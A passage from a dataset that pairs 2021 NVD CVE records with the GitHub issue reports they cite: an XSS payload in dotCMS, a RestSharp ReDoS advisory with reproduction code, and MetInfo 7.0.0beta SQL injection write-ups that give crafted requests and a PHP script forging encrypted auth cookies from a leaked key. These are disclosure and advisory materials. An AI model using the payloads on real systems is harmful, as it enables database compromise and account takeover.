![4](https://user-images.githubusercontent.com/62001260/121980853-e2ef2f00-cdb6-11eb-880e-979f3fe585fb.PNG) ![5](https://user-images.githubusercontent.com/62001260/121980855-e2ef2f00-cdb6-11eb-8e9a-fdb645ac878b.PNG) ![6](https://user-images.githubusercontent.com/62001260/121980856-e387c580-cdb6-11eb-9468-e97f7e2ec420.PNG) ![7](https://user-images.githubusercontent.com/62001260/121980858-e4205c00-cdb6-11eb-9e47-d18d760d0359.PNG) **Desktop (please complete the following information):** - OS: Win 10 - Browser Chrome: Version 91.0.4472.77 (Official Build) (64-bit)
Store XSS in dotAdmin/#/c/c_Images on dotcms:21.05.1
https://api.github.com/repos/dotCMS/core/issues/20540/comments
2
2021-06-15T01:52:32Z
2021-07-10T12:22:28Z
https://github.com/dotCMS/core/issues/20540
920,910,237
20,540
2,165
CVE-2021-35360
2021-07-09T22:15:08.433
A reflected cross site scripting (XSS) vulnerability in dotAdmin/#/c/containers of dotCMS 21.05.1 allows attackers to execute arbitrary commands or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/20541" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/20541" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotcms:dotcms:21.05.1:*:*:*:*:*:*:*", "matchCriteriaId": "10FB1890-E260-4DA5-A2D4-C037D6A1CEAE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/dotCMS/core/issues/20541
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dotCMS", "core" ]
**Describe the bug** Hi Team I found small reflected xss dotcms/dotcms:21.05.1 install: Docker: dotcms/dotcms:21.05.1 **To Reproduce** 1. Login Admin panel 2. vuln link1: 'dotAdmin/#/c/containers' 3. vuln link2: 'dotAdmin/#/c/links' 4. insert payload: "><im g src=xx oner ror=alert(document.domain)> 5. para: 'SEARCH' 6. Boom XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** xss link1: ![Capture1](https://user-images.githubusercontent.com/62001260/121990915-cfe55a80-cdc8-11eb-9956-19cc5cc9ba96.PNG) xss link2: ![Capture2](https://user-images.githubusercontent.com/62001260/121990925-d4aa0e80-cdc8-11eb-9739-e54710761ab9.PNG) **Desktop (please complete the following information):** - OS: Win 10 - Browser Chrome: Version 91.0.4472.77 (Official Build) (64-bit)
Reflected XSS Vulnerability on Docker: dotcms/dotcms:21.05.1
https://api.github.com/repos/dotCMS/core/issues/20541/comments
2
2021-06-15T04:00:37Z
2021-07-10T12:21:44Z
https://github.com/dotCMS/core/issues/20541
920,960,756
20,541
2,166
CVE-2021-27293
2021-07-12T11:15:08.100
RestSharp < 106.11.8-alpha.0.13 uses a regular expression which is vulnerable to Regular Expression Denial of Service (ReDoS) when converting strings into DateTimes. If a server responds with a malicious string, the client using RestSharp will be stuck processing it for an exceedingly long time. Thus the remote server can trigger Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/restsharp/RestSharp/issues/1556" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://restsharp.dev/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/restsharp/RestSharp/issues/1556" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://restsharp.dev/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:restsharp:restsharp:*:*:*:*:*:*:*:*", "matchCriteriaId": "ED720ADD-C611-4541-B637-8E43B63AFF95", "versionEndExcluding": null, "versionEndIncluding": "106.11.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.10:*:*:*:*:*:*", "matchCriteriaId": "4F1B7ECC-4AAA-4830-A94C-8C4CC1DDF008", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.11:*:*:*:*:*:*", "matchCriteriaId": "744F5450-A340-4484-8CC2-483886C0E75B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.12:*:*:*:*:*:*", "matchCriteriaId": "81B83013-BACA-463A-B20D-6C22BF27317F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.2:*:*:*:*:*:*", "matchCriteriaId": "FDB472BE-A8F8-4001-9F88-9F6FF7F26375", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.3:*:*:*:*:*:*", "matchCriteriaId": "EE119EAE-E84F-4134-A432-DB625DE49190", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.4:*:*:*:*:*:*", "matchCriteriaId": "9F7D3C04-6760-4A72-AC13-287E12DE8276", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.6:*:*:*:*:*:*", "matchCriteriaId": "F7134DE4-9E43-43E6-82BF-C0502AA3F30E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:restsharp:restsharp:106.11.8:alpha0.7:*:*:*:*:*:*", "matchCriteriaId": "7FC1A2B8-6AA1-4477-80BD-9043D202D5F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/restsharp/RestSharp/issues/1556
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "restsharp", "RestSharp" ]
This advisory was emailed to the maintainer. Posting here as an issue as requested. # Doyensec Vulnerability Advisory * Regular Expression Denial of Service (REDoS) in RestSharp * Affected Product: RestSharp (All released versions) * Vendor: https://restsharp.dev * Severity: Medium * Vulnerability Class: Denial of Service * Status: Open * Author: Ben Caller ([Doyensec](https://doyensec.com)) # SUMMARY The .NET library RestSharp uses a regular expression which is vulnerable to Regular Expression Denial of Service (REDoS) when converting strings into DateTimes. If a server responds with a malicious string, the client using RestSharp will be stuck processing it for an exceedingly long time. This allows the remote server to trigger a Denial of Service. # TECHNICAL DESCRIPTION The vulnerable regular expression is `NewDateRegex` in `RestSharp.Extensions.StringExtensions`: https://github.com/restsharp/RestSharp/blob/0ed7b0a6b64ab4b9838c2c0cb76a1808facebe09/src/RestSharp/Extensions/StringExtensions.cs#L28 It is used by the `ParseJsonDate` function when deserializing JSON responses into classes with `DateTime` properties. Due to the `(-?\d+)*` part containing nested repeats, this regular expression has catastrophic backtracking when processing a long string of digits. The behaviour occurs as long as the digits are *not* followed immediately by a closing parenthesis ')'. An example of a REDoS payload is `new Date(12345678901234567890123456789012345`. The space between 'new' and 'Date' is required due to pre-processing in `ParseJsonDate`: https://github.com/restsharp/RestSharp/blob/0ed7b0a6b64ab4b9838c2c0cb76a1808facebe09/src/RestSharp/Extensions/StringExtensions.cs#L124-L126 The complexity is exponential: increasing the length of the malicious string of digits by one makes processing take about twice as long. On my laptop, 27 digits takes about 16 seconds to process and 28 digits takes about 32 seconds, so a string with 54 digits should take approximately 68 years to process. The vulnerable regular expression was first introduced in commit https://github.com/restsharp/RestSharp/commit/373a0a3d52dede087f424949db1e02e7d06287fd # REPRODUCTION STEPS The REDoS can be triggered by calling `RestSharp.Extensions.StringExtensions.ParseJsonDate` directly, or by deserializing JSON responses into a class with a property of type `DateTime`. Example C# code to see the effect of the REDoS is attached below. Changing the length of the string of zeroes will change the processing time. ```c# using System; using System.Globalization; using RestSharp; using RestSharp.Extensions; using RestSharp.Serialization.Json; namespace DoyensecRestSharpRedosTest { class Thing { public DateTime Time { get; set; } } class Program { static void ByParseJsonDate() { var redos = "new Date(" + new String('0', 30); DateTime dt = StringExtensions.ParseJsonDate(redos, CultureInfo.InvariantCulture); } static void ByDeserializer() { var redosJson = @"{""Time"": ""new Date(" + new String('0', 30) + @"""}"; var thing = (new JsonDeserializer()).Deserialize<Thing>(new RestResponse {Content = redosJson}); Console.WriteLine(thing.Time); } static void ByRequest() { // Server should return JSON {"Time": "new Date(000000000000000000000000000000"} Thing thing = new RestClient("https://localhost/thing.json").Execute<Thing>(new RestRequest(Method.GET)).Data; Console.WriteLine(thing.Time); } static void Main(string[] args) { ByDeserializer(); // or try ByParseJsonDate() or ByRequest() } } } ``` # REMEDIATION Fix `NewDateRegex`. We propose simply removing the asterisk: ```c# static readonly Regex NewDateRegex = new Regex(@"newDate\((-?\d+)\)"); ``` . Doyensec (www.doyensec.com) is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright 2021 by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as-is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
CVE-2021-27293: Fix NewDateRegex
https://api.github.com/repos/restsharp/RestSharp/issues/1556/comments
11
2021-02-16T20:01:32Z
2024-01-17T17:12:45Z
https://github.com/restsharp/RestSharp/issues/1556
809,607,536
1,556
2,167
CVE-2020-21131
2021-07-12T13:15:07.657
SQL Injection vulnerability in MetInfo 7.0.0beta via admin/?n=language&c=language_web&a=doAddLanguage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/SZFsir/tmpProject/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "SZFsir", "tmpProject" ]
Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 After admin login,(You must send different order and mask column below) ## payload ``` POST /metinfo/7.0beta/admin/?n=language&c=language_web&a=doAddLanguage&langconfig=1%20union%20select%201,2,3,4,sleep(10)%23 HTTP/1.1 Host: 127.0.0.1:7000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------19314199136116280411402994027 Content-Length: 1763 Origin: http://127.0.0.1:7000 Connection: close Referer: http://127.0.0.1:7000/metinfo/7.0beta/admin/?lang=cn&n=ui_set Cookie: think_template=default; PHPSESSID=4a94ab2d971cee639ee614b5e469c456; upgraderemind=1; MEIQIA_VISIT_ID=1TCdE0t3buLmzz4IApfJNsjGjyj; acc_auth=6b04vpU051F%2F6wN0ICCF6vnI4A6LL3y077MyxZyQ9UGOhaZ21aOrwAybTO9AFQWJPAx43UeHIsCEPhVBCEZmqWUq; acc_key=TasaQFt; Hm_lvt_520556228c0113270c0c772027905838=1573030774; Hm_lpvt_520556228c0113270c0c772027905838=1573062137; re_url=http%3A%2F%2F127.0.0.1%2Fmetinfo%2F7.0beta%2Fadmin%2F; met_auth=91a0MGQ%2F%2FmzVp57PpH7xa%2B156lDDaFD3i1oczcMgjfXhSdOtiJ85lBqtyj6RPkm41fJ6vR2sCavBRxbyGT6QqowQ; met_key=hUhOIRJ; admin_lang=cn; page_iframe_url=http%3A%2F%2F127.0.0.1%3A7000%2Fmetinfo%2F7.0beta%2Findex.php%3Flang%3Dcn%26pageset%3D1 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="order" 999 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="autor" 0 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="name" qqqq -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="flag" cn.gif -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="mark" 888 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="file" cn -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="copy_config" cn -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="content" -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="theme_style" -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="useok" 1 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="link" -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="useok" 1 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="newwindows" 0 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="type" 0 -----------------------------19314199136116280411402994027 Content-Disposition: form-data; name="submit_type" save -----------------------------19314199136116280411402994027-- ``` ![图片](https://user-images.githubusercontent.com/24249321/68374614-2f589e80-0180-11ea-8fa0-cc91a050200f.png)
Metinfo7.0 admin background SQL Injection
https://api.github.com/repos/SZFsir/tmpProject/issues/3/comments
0
2019-11-07T09:01:40Z
2019-11-07T09:01:40Z
https://github.com/SZFsir/tmpProject/issues/3
519,130,052
3
2,168
CVE-2020-21132
2021-07-12T13:15:07.690
SQL Injection vulnerability in Metinfo 7.0.0beta in index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/SZFsir/tmpProject/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "SZFsir", "tmpProject" ]
Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 To demonstrate this vuln, follow three steps below. ## First, Get the key Metinfo disclosure the key by /config/config_safe.php ![图片](https://user-images.githubusercontent.com/24249321/68369824-26fb6600-0176-11ea-930e-12de45395236.png) ## Then, encrypt the payload Metinfo7.0 Use encrypt cookie to auth login. We can see it use user input as auth and key to pass it to login_by_auth function ![图片](https://user-images.githubusercontent.com/24249321/68371798-73e13b80-017a-11ea-9dd1-cb9217b337f6.png) In login_by_auth function, It use getauth function decode the auth data by the key we input. ![图片](https://user-images.githubusercontent.com/24249321/68371945-cfabc480-017a-11ea-9297-69cd929eb62e.png) And then in login_by_password pass the username(sql inject payload) and then cause sqli We have the key, and we know the way to encrypt data. As below ``` function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){ $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } }else{ return $keyc.str_replace('=', '', base64_encode($result)); } } echo var_dump($argv[1]); echo urlencode(authcode($argv[1]."\t1234",'ENCODE','dxeOfyLMbaJiK7SBzT8UC3kiwRNOdKoY'.'abcd')); ``` ![图片](https://user-images.githubusercontent.com/24249321/68373857-ab51e700-017e-11ea-8f11-d8a3299bac3b.png) ## Finally, send the payload (You should encrypt the data first) ``` GET /metinfo/7.0beta/index.php HTTP/1.1 Host: 127.0.0.1:7000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh,en;q=0.5 Origin: http://127.0.0.1:7000 Connection: close Cookie: acc_auth=747cs0xMOG3WQ%2BgyHeTJbp%2BF1SszYl9LAOw36gTFpMmAnePPnoQCr%2FLtzbnD8tOg1WdylIQ; acc_key=abcd; Content-Length: 0 ``` (execute the sql twice) ![图片](https://user-images.githubusercontent.com/24249321/68373963-df2d0c80-017e-11ea-9656-60070d73317e.png)
Metinfo7.0 SQL Injection
https://api.github.com/repos/SZFsir/tmpProject/issues/2/comments
0
2019-11-07T08:52:22Z
2019-11-07T08:52:22Z
https://github.com/SZFsir/tmpProject/issues/2
519,125,630
2
2,169
CVE-2020-21133
2021-07-12T13:15:07.727
SQL Injection vulnerability in Metinfo 7.0.0 beta in member/getpassword.php?lang=cn&a=dovalid.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SZFsir/tmpProject/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.mituo.cn/news/2473.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/SZFsir/tmpProject/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "SZFsir", "tmpProject" ]
Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 To demonstrate this vuln, follow three steps below. ## First, Get the key Metinfo disclosure the key by /config/config_safe.php ![图片](https://user-images.githubusercontent.com/24249321/68369824-26fb6600-0176-11ea-930e-12de45395236.png) ## Then, encrypt the payload Metinfo7.0 Use encrypt email to check email valid. We can see after decode the data, It pass the email to get_user_by_email function ![图片](https://user-images.githubusercontent.com/24249321/68370142-c3256d00-0176-11ea-993c-136042369f4e.png) Then get_user_by_email function pass it to get_user_by_emailid function ![图片](https://user-images.githubusercontent.com/24249321/68370326-2c0ce500-0177-11ea-86d0-c9a921e97b6f.png) Finally, It cause sql injection. ![图片](https://user-images.githubusercontent.com/24249321/68370455-7ee69c80-0177-11ea-96a7-f21b3dcd86c8.png) We have the key, and we know the way to encrypt data. As below ``` function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){ $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } }else{ return $keyc.str_replace('=', '', base64_encode($result)); } } echo var_dump($argv[1]); echo urlencode(authcode($argv[1],'ENCODE','dxeOfyLMbaJiK7SBzT8UC3kiwRNOdKoY')); ``` ![图片](https://user-images.githubusercontent.com/24249321/68370627-e866ab00-0177-11ea-887d-30ac712720e9.png) ## Finally, send the payload (You should encrypt the data first) ``` POST /metinfo/7.0beta/member/getpassword.php?lang=cn&a=dovalid HTTP/1.1 Host: 127.0.0.1:7000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: 